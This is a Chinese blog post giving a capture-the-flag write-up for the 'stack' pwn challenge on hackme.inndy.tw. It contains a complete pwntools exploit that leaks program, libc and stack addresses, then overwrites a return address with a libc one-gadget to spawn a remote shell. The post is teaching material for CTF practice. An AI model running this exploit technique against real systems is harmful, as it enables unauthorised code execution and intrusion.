stack的wp

最新推荐文章于 2022-03-18 22:53:35 发布
最新推荐文章于 2022-03-18 22:53:35 发布
阅读量2k 收藏
点赞数
分类专栏: ctf的wp 文章标签: wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/niexinming/article/details/78666941
版权

https://hackme.inndy.tw/scoreboard/ 题目很有趣,我做了stack这个题目感觉还不错,我把wp分享出来,方便大家学习
stack的题目要求是: 

nc hackme.inndy.tw 7716

Here is my C programming homework
But compiled with full protection (RELRO, PIE, NX, Stack Canary).
You can pwn it! Can't you?
https://github.com/Inndy/NTUST-CSIE-Homework/blob/master/C_Programming/2014-11-18/HW1118_B10315005_02.c

程序的源码在https://github.com/Inndy/NTUST-CSIE-Homework/blob/master/C_Programming/2014-11-18/HW1118_B10315005_02.c
这个程序很简单,就是模拟程序中栈的操作
先运行一下程序看一下这个程序干了啥
image
看到这个程序可以通过出栈的操作泄露程序的基地址,libc的基地址,程序栈的地址,入栈的时候可以在栈中写入任意数据
再看看程序开启了哪些保护:
image
看到这个程序保护全开
这个题目我的思路是通过pop栈来泄露程序的基地址,libc的基地址,栈的地址,然后通过栈中写数据,控制eip,让eip跳到libc中执行exec(/bin/sh)的地址就可以getshell了

我的exp是: 

from pwn import *
import sys, os
import ctypes as ct

wordSz = 4
hwordSz = 2
bits = 32
PIE = 0
mypid=0

localMAGIC = 0x0003AC69      #locallibc
remoteMAGIC = 0x0003AC49      #remotelibc

context(arch='i386', os='linux', log_level='debug')

def leak(address, size):
   with open('/proc/%s/mem' % mypid) as mem:
      mem.seek(address)
      return mem.read(size)

def findModuleBase(pid, mem):
   name = os.readlink('/proc/%s/exe' % pid)
   with open('/proc/%s/maps' % pid) as maps:
      for line in maps:
         if name in line:
            addr = int(line.split('-')[0], 16)
            mem.seek(addr)
            if mem.read(4) == "\x7fELF":
               bitFormat = u8(leak(addr + 4, 1))
               if bitFormat == 2:
                  global wordSz
                  global hwordSz
                  global bits
                  wordSz = 8
                  hwordSz = 4
                  bits = 64
               return addr
   log.failure("Module's base address not found.")
   sys.exit(1)

def debug(addr = 0):
    global mypid
    mypid = proc.pidof(r)[0]
    raw_input('debug:')
    with open('/proc/%s/mem' % mypid) as mem:
        moduleBase = findModuleBase(mypid, mem)
        gdb.attach(r, "set follow-fork-mode parent\nb *" + hex(moduleBase+addr))


def tohex(val, nbits):
    return hex((val + (1 << nbits)) % (1 << nbits))

def base_addr(prog_addr,offset):
    return eval(prog_addr)-offset

#r = process('/home/h11p/hackme/stack')

r = remote('hackme.inndy.tw', 7716)

elf = ELF('/home/h11p/hackme/stack')
print "bss:"+hex(elf.bss())
print "puts_addr:"+hex(elf.plt["puts"])

#debug(addr=0x0715)

MAGIC_addr=0x0
stack_addr=0x0

r.recvuntil('Cmd >>\n')
r.sendline('i')
r.sendline('1234')
r.recv()
for i in xrange(0,15):
    r.sendline("p")
    myrecv=r.recv()

    if i==4:
        print str(i)+":",
        prog_addr=tohex(int(myrecv.splitlines()[0][7:]),32)
        print prog_addr
        base_module=hex(base_addr(prog_addr,0x75a))
        print "elf_addr:"+base_module
    elif i==7:
        print str(i) + ":",
        stack_addr = tohex(int(myrecv.splitlines()[0][7:]), 32)
        print "stack_addr:"+stack_addr
    elif i==13:
        print str(i) + ":",
        scanf_addr=tohex(int(myrecv.splitlines()[0][7:]), 32)
        print scanf_addr
        scanf_base_addr=hex(base_addr(scanf_addr,0xb))
        print "scanf_base_addr:"+scanf_base_addr

        # remotelibc
        libc_module = hex(base_addr(scanf_addr, 0x05bfeb))
        print "libc_module:" + libc_module
        MAGIC_addr = eval(libc_module) + remoteMAGIC
        print "MAGIC_addr:" + hex(MAGIC_addr)
        print "MAGIC_addr_10:",
        print ct.c_int32(MAGIC_addr).value


        '''
        #locallibc
        libc_module = hex(base_addr(scanf_addr, 0x5c0cb))
        print "libc_module:" + libc_module
        MAGIC_addr=eval(libc_module)+localMAGIC
        print "MAGIC_addr:"+hex(MAGIC_addr)
        print "MAGIC_addr_10:",
        print ct.c_int32(MAGIC_addr).value
        '''
for j in xrange(0,6):
    print "this is:"+str(j)
    r.sendline('i')
    #r.sendline(str(ct.c_int32(eval(stack_addr)).value))
    r.sendline(str(ct.c_int32(eval(stack_addr)+0x160).value))
    r.recv()

r.sendline('i')
#r.sendline(str(ct.c_int32(eval(stack_addr)).value))
r.sendline(str(ct.c_int32(MAGIC_addr).value))
#r.recv()

r.interactive()

因为这个题目的地址是随机的,所以根据http://blog.csdn.net/niexinming/article/details/78512274中我在echo2中的调试思路来设置断点,后面的开始利用pop来泄露程序地址,__isoc99_scanf(+11),栈地址,然后根据偏移来计算程序的基地址,libc基地址,栈地址,然后利用入栈在栈中写数据,当写入第6个参数的时候就可以覆盖stack_push的返回地址了,然后把计算好的MAGIC地址就可以getshell了,其中输入的前五个数据是栈底指针,因为覆盖栈中数据时候要保证原有栈结构不被破坏,而且泄露出来的栈地址和stack_push栈底指针的偏移是不变的
注意一点的是程序入栈操作是输入十进制,十六进制转十进制要靠ctypes.c_int32(0x123).value来转换

关于远程的libc的版本的问题:
因为程序在出栈的时候泄露了__isoc99_scanf(+11)的地址,所以利用libc-database得知远程服务器的libc版本是archive-glibc (id libc6_2.23-0ubuntu3_i386),然后逆向寻找MAGIC的地址

最后的效果
image

niexinming
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn-stack-wp
diaojian3887的博客
08-29 190
stack2 知识点:数组溢出 正文 程序拖入IDA进行反编译,查看逻辑。 既然发现了溢出点,那么就是确定我们的ret地址和数组第一位数据的距离问题。我们使用gdb进行动态调试。 在0x0804884D进行下断点。我们根据选项去更改数组中第一位的数据。得到数组起始地址为0xffffcef8。 找到起始地址之后,我们去寻找执行ret指令时,栈的地址然后求其差值即可。...
一道stack的题目
hyj1996cake的博客
09-23 200
原题如下 Given an encoded string, return it’s decoded string.The encoding rule is: k[encoded_string], where the encoded_string inside the square brackets is being repeated exactly k times. Note that k is
Stack经典编程题
weixin_48654011的博客
03-18 376
逆波兰表达式求值(后缀表达式)、括号匹配、出栈入栈次序匹配 目录 逆波兰表达式求值 20. 有效的括号 JZ31栈的压入、弹出序列 逆波兰表达式求值 示例1: 输入:tokens = ["2","1","+","3","*"] 输出:9 解释:该算式转化为常见的中缀算术表达式为:((2 + 1) * 3) = 9 来源:力扣(LeetCode) 链接:https://leetcode-cn.com/problems/evaluate-reverse-polish-notation ..
Leetcode-标签为stack的easy题目列表
相信相信的力量
04-15 700
Leetcode-标签为stack的题目列表
rop和rop2的题目的wp
一个码农的笔记
10-17 4468
https://hackme.inndy.tw/scoreboard/ 题目很有趣,我做了rop和rop2这两个题目感觉还不错,我把wp分享出来,方便大家学习 首先先是rop这个题目,下载地址就在https://hackme.inndy.tw/scoreboard/,如果做题的网站关闭或者被墙,就可以从http://download.csdn.net/download/niexinming/100
使用wordpress+webstack 主题快速搭建导航网站
最新发布
08-24
解压后,将WebStack主题文件夹上传到WordPress的wp-content/themes目录。您可以通过FTP客户端或者通过WordPress后台的“外观”>“主题”>“添加新主题”>“上传主题”来完成此步骤。 安装完WebStack主题后,记得...
WebStack-Laravel-master.zip
07-14
一旦WordPress安装完毕,用户可以将WebStack-Laravel-master.zip文件上传到WordPress的主题目录中,通常位于wp-content/themes/。然后,通过WordPress的管理后台激活此主题,即可在网站上看到新的导航样式和布局。 ...
wp-stack:Docker 的最小 WordPress 堆栈
06-19
WP-STACK 是用于 Docker 和的最小 WordPress 堆栈。特征NGINX + PHP-FPM SSL/SPDY 支持Web 应用程序防火墙 (WAF) WP-CLI 命令行工具Amazon S3 备份(很快) 导入/导出站点(很快)使用 Docker 部署创建数据库docker ...
stack:用于部署WP3服务的Docker堆栈
03-19
这个仓库是一个由docker-compose组成的堆栈,用于运行具有创意的WP3的核心服务。这里定义了几个服务:是基本服务,例如反向代理。是我们运行的服务的实例,例如zammad。 用作子模块,以简化使用其撰写文件的工作。...
wp:白皮书代码
02-13
白皮书的想法rlwrap COMPLETE https://kx.com/blog/unwrapping-rlwrap/highAvailHdb CODEDqQueues IDEAoverrides IDEAtmux/screen stack IDEAbase64 encoding options data IDEA ...symlinked hdb - symlink...
2017湖湘杯pwn100的wp
一个码农的笔记
11-30 2708
湖湘杯的pwn比赛很有趣,我做了pwns100的题目,感觉不错,我把wp分享出来,pwns的下载链接是:http://download.csdn.net/download/niexinming/10139497 把pwns100直接拖入ida中: main函数: base64解码函数 输入函数 可以看到read可以输入的字符串可以长达0x200个,这里可造成缓冲区溢出漏洞
攻防世界逆向wp
一筐萝卜的博客
05-14 4617
reverse-box 在平台上题目描述不全,少了一个重要的提示信息 原题题目描述 $ ./reverse_box ${FLAG} 95eeaf95ef94234999582f722f492f72b19a7aaf72e6e776b57aee722fe77ab5ad9aaeb156729676ae7a236d99b1df4a 也就是说,当输入争取的flag的时候,程序应该输出的是这一个字符串(如果...
ROP2 ROP的启蒙题
snowleopard_bin的博客
08-05 377
from pwn import * cn = remote('hackme.inndy.tw',7703) #context.log_level='debug' elf = ELF('rop2') syscall = elf.symbols['syscall'] print "%x"%syscall over = elf.symbols['overflow'] bss = elf.bss() ...
关于WPF C#的一些常用代码汇总
qq_34739157的博客
12-03 1146
一、工作目录的运行环境的相对路径 DirectoryInfo dirInfo = new DirectoryInfo(Path.GetDirectoryName(Assembly.GetExecutingAssembly().Location)); 二、更新或配置Config文件 public static void AddUpdateAppSettings(string key, string value) { try {
WPF#基础
Krisiiy
10-27 1634
C#基础 1、Wpf中的ResourceDirectory WPF对象资源的定义和查找 每个WPF界面元素都有一个名为Resource的属性,这个属性继承至FrameworkElement类,其类型为ResourceDictionary。ResourceDictionary能够以键值对的形式存储资源,当要使用到某个资源的时候,使用键值对的形式获取资源对象。在保存资源时,ResourceDictionary视资源对象为Object类型,所以再使用资源时先要对资源对象进行类型转换,XAML编译器能够根据Attr
onepunch的wp
一个码农的笔记
11-15 2964
https://hackme.inndy.tw/scoreboard/ 题目很有趣,我做了onepunch这个题目感觉还不错,我把wp分享出来,方便大家学习 onepunch的题目要求是: nc hackme.inndy.tw 7718Punch!这个题目没有太多提示 下面我用ida打开smashthestack这个程序看main函数 这个程序在16行有一个任意地址写的漏洞,程序输入的第
hackme inndy pwn stack writeup
charlie_heng的专栏
01-02 477
这题看起来很恐怖,所有保护都开了,但是其实并没有想象中难 这题先pop 两次,再push回去一个,然后再push下标,就可以直接绕过canary,把ret的地址给leak出来 再减去libc里面的__libc_start_main偏移,再把低三位给清零就得到libc基址 之后就是常规rop了,这里直接执行system(‘/bin/sh’) 下面就是利用的代码 from pwn imp...
hackme pwn onepunch
ACdream
03-14 482
做的题太少了,不知道应该把这种题目如何归类 int __cdecl main(int argc, const char **argv, const char **envp) { …… v5 = __isoc99_scanf("%llx %d", &amp;v6, &amp;v4); if ( v5 != 2 ) return 0; *v6 = v4; …… ...
WordPress中wp-Syntax插件使用方法
mxc的专栏
10-11 1125
源自:http://mxc.space/ 刚建好博客,想把以前写的几篇文章转到现在的博客上,但发现代码没有高亮显示,感觉看代码很不习惯,于是下载了wp-Sytax插件,折腾了半天总算会用了。 使用方法: //code lang="language"表示代码语言为language; line="1" 表示显示行号,如果不需要,去掉即可;escaped="true" 是

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值